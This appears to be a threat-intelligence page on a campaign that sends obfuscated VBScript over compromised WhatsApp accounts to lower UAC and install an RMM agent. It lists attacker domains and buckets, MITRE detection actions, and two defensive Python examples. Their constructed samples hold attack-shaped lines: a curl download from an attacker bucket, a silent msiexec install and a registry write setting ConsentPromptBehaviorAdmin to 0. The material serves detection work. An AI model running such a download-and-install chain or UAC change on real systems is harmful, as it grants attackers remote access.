WhatsApp VBScript RMM Campaign

Tags: WhatsApp, VBScript, RMM Abuse, UAC Bypass, Social Engineering

An unattributed, access-motivated actor is abusing compromised WhatsApp accounts to send those accounts' contacts heavily obfuscated VBScript files disguised as business and financial documents. When opened, the VBScript runs a multi-stage chain that lowers the Windows User Account Control prompt level and silently installs a preconfigured ManageEngine Endpoint Central (RMM) agent, giving the attacker remote access to the victim's machine.

Indicators of Compromise

invoice.msopsa.top
facaia.s3.us-east-005.backblazeb2.com
yifubafu.s3.ap-southeast-1.amazonaws.com
hksha3.s3.ap-southeast-1.amazonaws.com
qse.shoppes.help
caiwuascw.s3.us-east-005.backblazeb2.com
sjdkjj23.s3.ap-southeast-1.amazonaws.com
xijkwm2.s3.ap-southeast-1.amazonaws.com
baoyuw2s.s3.ap-southeast-1.amazonaws.com
shaaslong.one
baolongwes.oss-ap-southeast-1.aliyuncs.com
temu.baskwms.top
baoxis.cc
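The list above is only useful once it is matched against DNS and proxy telemetry, and two details matter when doing that: indicators should match their own subdomains (cdn.temu.baskwms.top is still temu.baskwms.top), but the bucket hostnames must match exactly, because their registrable domain is the shared cloud provider and every tenant lives under it. The matcher below is an added example, not code from the page or any vendor; the indicator set is copied from the list above, while the log lines, hosts and timestamps are constructed for illustration.

```python
"""Match the campaign's network indicators against DNS / proxy log lines.

Added example, not part of the original page. The indicator set is the
page's IOC list; SAMPLE_LOG is constructed and the hosts in it are made up.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the page's IOC list.
CAMPAIGN_IOCS = {
    "invoice.msopsa.top",
    "facaia.s3.us-east-005.backblazeb2.com",
    "yifubafu.s3.ap-southeast-1.amazonaws.com",
    "hksha3.s3.ap-southeast-1.amazonaws.com",
    "qse.shoppes.help",
    "caiwuascw.s3.us-east-005.backblazeb2.com",
    "sjdkjj23.s3.ap-southeast-1.amazonaws.com",
    "xijkwm2.s3.ap-southeast-1.amazonaws.com",
    "baoyuw2s.s3.ap-southeast-1.amazonaws.com",
    "shaaslong.one",
    "baolongwes.oss-ap-southeast-1.aliyuncs.com",
    "temu.baskwms.top",
    "baoxis.cc",
}


def normalize_host(value):
    """Reduce a bare hostname or a URL to a lower-case hostname.

    Strips scheme, path, query, :port and a trailing dot so that
    'https://CDN.temu.baskwms.top:8443/x' and 'cdn.temu.baskwms.top.'
    compare equal.
    """
    value = value.strip().lower()
    if "://" in value:
        return (urlsplit(value).hostname or "").rstrip(".")
    value = value.split("/", 1)[0]
    value = re.sub(r":\d+$", "", value)
    return value.rstrip(".")


def match_host(host):
    """Return the indicator a hostname matches, or None.

    An exact match always counts. A parent-domain match counts when a listed
    indicator is a suffix of the host on a label boundary. The bucket
    hostnames in the list only ever match exactly, because nothing shorter
    than the full bucket host is attacker-controlled: 'amazonaws.com' and
    friends are never promoted to indicators here.
    """
    host = normalize_host(host)
    if not host:
        return None
    if host in CAMPAIGN_IOCS:
        return host
    labels = host.split(".")
    for i in range(1, len(labels) - 1):
        parent = ".".join(labels[i:])
        if parent in CAMPAIGN_IOCS:
            return parent
    return None


def scan_log(lines):
    """Return (line_number, indicator, line) for each line touching an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in line.split():
            ioc = match_host(token)
            if ioc:
                hits.append((n, ioc, line))
                break
    return hits


# Constructed proxy/DNS log sample; none of these hosts or clients are real data.
SAMPLE_LOG = """\
2025-03-04T09:12:01Z 10.20.1.15 DNS A invoice.msopsa.top
2025-03-04T09:12:02Z 10.20.1.15 GET https://yifubafu.s3.ap-southeast-1.amazonaws.com/Invoice_2025.zip 200
2025-03-04T09:12:05Z 10.20.1.15 GET https://legit-backups.s3.ap-southeast-1.amazonaws.com/daily.tar 200
2025-03-04T09:12:09Z 10.20.1.16 DNS A cdn.temu.baskwms.top
2025-03-04T09:12:11Z 10.20.1.16 GET https://www.example.com/ 200
""".splitlines()

if __name__ == "__main__":
    for n, ioc, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ioc}  <-  {line}")
```

Line 3 of the sample is the case to watch for: a bucket on the same provider and region as the attacker's, which must not fire. Feeding the registrable domain of the bucket hosts into a blocklist would break every workload on that provider, so the bucket entries stay exact-match only.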

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Remediation / Detections

Source: attack.mitre.org

Technique ID | Technique Name | Detection ID | Detection Name
  Action: Recommended Detection Action

T1566.003 | Phishing: Spearphishing via Service | DET0115 | Detection Strategy for Spearphishing via a Service
  Action: Monitor messaging platform API logs and endpoint telemetry for VBScript files delivered via WhatsApp Desktop or WhatsApp Web processes.

T1204.002 | User Execution: Malicious File | DET0294 | User Execution – Malicious File
  Action: Alert on WScript.exe or CScript.exe spawned by WhatsApp.Root.exe, explorer.exe, or browsers opening files from the Downloads directory.

T1059.005 | Command and Scripting Interpreter: Visual Basic | DET0076 | Behavioral Detection of Visual Basic Execution
  Action: Detect WScript.exe executing .vbs/.vbe files from C:\Users\Public\Documents\ or user temp directories; flag multi-stage download chains.

T1059.001 | Command and Scripting Interpreter: PowerShell | DET0455 | Abuse of PowerShell for Arbitrary Execution
  Action: Alert on PowerShell invoked by VBScript (WScript.exe → powershell.exe) performing file download operations.

T1105 | Ingress Tool Transfer | DET0060 | Detect Ingress Tool Transfers via Behavioral Chain
  Action: Monitor for curl.exe, bitsadmin.exe, or certutil.exe spawned by scripting engines downloading content from cloud storage buckets (S3, Alibaba OSS, Backblaze).

T1140 | Deobfuscate/Decode Files or Information | DET0275 | Detect Adversary Deobfuscation or Decoding
  Action: Detect certutil -decode or PowerShell Base64 decode operations performed by WScript child processes.

T1027 | Obfuscated Files or Information | DET0378 | Behavioral Detection of Obfuscated Files or Information
  Action: Flag VBScript files with excessive string concatenation, randomized variable names, or entropy anomalies indicative of heavy obfuscation.

T1036.008 | Masquerading: Masquerade File Type | DET0226 | Detection Strategy for Masquerading via File Type Modification
  Action: Alert on file rename operations that change extensions from .pdf or .txt to .vbs performed by scripting engine child processes.

T1197 | BITS Jobs | DET0098 | Detect abuse of Windows BITS Jobs
  Action: Monitor BitsTransfer or bitsadmin.exe download jobs created by WScript.exe; alert on BITS jobs targeting non-corporate cloud storage domains.

T1553.005 | Subvert Trust Controls: Mark-of-the-Web Bypass | DET0257 | Detect Mark-of-the-Web (MOTW) Bypass
  Action: Monitor for deletion of Zone.Identifier alternate data streams from files extracted by the Shell.Application CopyHere method.

T1548.002 | Abuse Elevation Control Mechanism: Bypass UAC | DET0388 | Detection Strategy for Bypass User Account Control (UAC)
  Action: Alert on repeated registry modification attempts targeting HKLM\...\Policies\System\ConsentPromptBehaviorAdmin via runas-elevated ShellExecute calls.

T1112 | Modify Registry | DET0280 | Behavior-Based Registry Modification Detection on Windows
  Action: Monitor registry writes to ConsentPromptBehaviorAdmin; alert on any change to a value of 0 (elevate without prompting) by anything other than approved endpoint-management tooling. A scripting-engine lineage writing this value is the campaign's signature.

T1564.001 | Hide Artifacts: Hidden Files and Directories | DET0032 | Detection Strategy for Hidden Files and Directories
  Action: Detect creation of directories under C:\Users\Public\Documents\ with hidden and system attributes set by scripting engine processes.

T1218.007 | System Binary Proxy Execution: Msiexec | DET0158 | Detection of Msiexec Abuse
  Action: Alert on msiexec.exe invoked silently (/qn) by WScript.exe or cmd.exe to install UEMSAgent.msi or other non-IT-approved MSI packages.

T1102 | Web Service | DET0425 | Suspicious Use of Web Services for C2
  Action: Detect outbound HTTP/HTTPS connections from WScript child processes to S3, Alibaba OSS (aliyuncs.com), or Backblaze B2 endpoints.

T1219 | Remote Access Tools | DET0496 | Behavior-Chain Detection for Remote Access Tools
  Action: Monitor for ManageEngine Endpoint Central agent registration beaconing to the 202.61.160.0/24 subnet or 38.55.151.63 not initiated by IT.
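Several of the rows above are weak on their own (msiexec /qn, curl.exe and a registry write each happen legitimately every day) and only become high-confidence when tied together by process lineage: a script engine launched from a messaging app or browser on a .vbs in a staging directory, a downloader beneath it pulling from cloud object storage, a ConsentPromptBehaviorAdmin write from that lineage, and a silent MSI install beneath it. The detector below is an added example, not code from the page, MITRE or any product. It runs those four rules over constructed Sysmon-style process-creation and registry-set events; every PID, path and command line in the sample is made up, the full registry key path is the standard one the table abbreviates, and the benign look-alikes (a logon script from a managed path, an IT-pushed agent install) are there to show what must not fire.

```python
"""Lineage-based detection for the WhatsApp VBScript -> RMM install chain.

Added example, not from the original page or any vendor. Events are reduced
to the fields the rules need (Sysmon event 1 process creation, event 13
registry value set). SAMPLE_EVENTS is constructed for illustration.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")
RegSet = namedtuple("RegSet", "pid key data")

# Apps from which a user opens a received attachment (assumed set; extend for your estate).
USER_LAUNCHERS = {"whatsapp.root.exe", "explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "powershell.exe", "pwsh.exe"}
CLOUD_STORAGE = ("amazonaws.com", "backblazeb2.com", "aliyuncs.com")
STAGING_DIRS = ("\\downloads\\", "\\users\\public\\documents\\", "\\temp\\")
# Full path of the value the table abbreviates as HKLM\...\Policies\System\ConsentPromptBehaviorAdmin.
UAC_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system\consentpromptbehavioradmin"


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


class ProcessTree:
    def __init__(self, procs):
        self.by_pid = {p.pid: p for p in procs}

    def parent(self, pid):
        p = self.by_pid.get(pid)
        return self.by_pid.get(p.ppid) if p else None

    def has_ancestor(self, pid, images):
        """True if any ancestor (excluding the process itself) has an image in `images`."""
        seen, cur = set(), self.parent(pid)
        while cur and cur.pid not in seen:
            if basename(cur.image) in images:
                return True
            seen.add(cur.pid)
            cur = self.parent(cur.pid)
        return False


def detect(events):
    """Return (technique, pid, reason) for each rule that fires."""
    procs = [e for e in events if isinstance(e, Proc)]
    tree, alerts = ProcessTree(procs), []
    for p in procs:
        img, cmd = basename(p.image), p.cmdline.lower()
        parent = tree.parent(p.pid)
        pimg = basename(parent.image) if parent else ""
        # T1204.002 / T1059.005: script engine from a user app on a .vbs/.vbe in a staging dir.
        if (img in SCRIPT_ENGINES and pimg in USER_LAUNCHERS
                and re.search(r"\.vb[se]\b", cmd) and any(d in cmd for d in STAGING_DIRS)):
            alerts.append(("T1059.005", p.pid, f"{pimg} -> {img}: {p.cmdline}"))
        # T1105 / T1102: downloader beneath a script engine fetching from cloud object storage.
        if img in DOWNLOADERS and tree.has_ancestor(p.pid, SCRIPT_ENGINES) and any(h in cmd for h in CLOUD_STORAGE):
            alerts.append(("T1105", p.pid, f"{img} under script engine: {p.cmdline}"))
        # T1218.007: silent msiexec install beneath a script engine.
        if img == "msiexec.exe" and tree.has_ancestor(p.pid, SCRIPT_ENGINES) and re.search(r"/q(n|uiet)\b", cmd):
            alerts.append(("T1218.007", p.pid, f"silent MSI install: {p.cmdline}"))
    # T1548.002 / T1112: ConsentPromptBehaviorAdmin set to 0 by a script engine or its descendants.
    for e in events:
        if isinstance(e, RegSet) and e.key.lower() == UAC_KEY and e.data == "0":
            src = tree.by_pid.get(e.pid)
            if src and (basename(src.image) in SCRIPT_ENGINES or tree.has_ancestor(e.pid, SCRIPT_ENGINES)):
                alerts.append(("T1548.002", e.pid, "ConsentPromptBehaviorAdmin=0 from script-engine lineage"))
    return alerts


# Constructed sample: the malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    Proc(1000, 300, r"C:\Program Files\WhatsApp\WhatsApp.Root.exe", "WhatsApp.Root.exe"),
    Proc(1001, 1000, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\alice\Downloads\Invoice_Q3.vbs"'),
    Proc(1002, 1001, r"C:\Windows\System32\cmd.exe", "cmd.exe /c stage.bat"),
    Proc(1003, 1002, r"C:\Windows\System32\curl.exe",
         r"curl.exe -s -o C:\Users\Public\Documents\Win\u.zip https://yifubafu.s3.ap-southeast-1.amazonaws.com/u.zip"),
    RegSet(1001, r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin", "0"),
    Proc(1004, 1002, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Users\Public\Documents\Win\UEMSAgent.msi /qn"),
    Proc(3000, 300, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(3001, 3000, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Scripts\logon.vbs"'),
    Proc(2000, 400, r"C:\Windows\CCM\CcmExec.exe", "CcmExec.exe"),
    Proc(2001, 2000, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Windows\ccmcache\1\UEMSAgent.msi /qn"),
]

if __name__ == "__main__":
    for technique, pid, reason in detect(SAMPLE_EVENTS):
        print(f"{technique}  pid={pid}  {reason}")
```

Each rule keys on lineage rather than on the binary alone, which is what keeps the IT-pushed UEMSAgent.msi install (no script engine above it) and the managed logon script (not in a staging directory) quiet while the WhatsApp-launched chain fires four times. Feed it from Sysmon or EDR process events with the same three fields and the same rules apply unchanged.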

Observed Countries (11)

AU (799)
BR (975)
ES (801)
GB (873)
IN (772)
MX (331)
MY (572)
RU (757)
SG (376)
TW (560)
VN (871)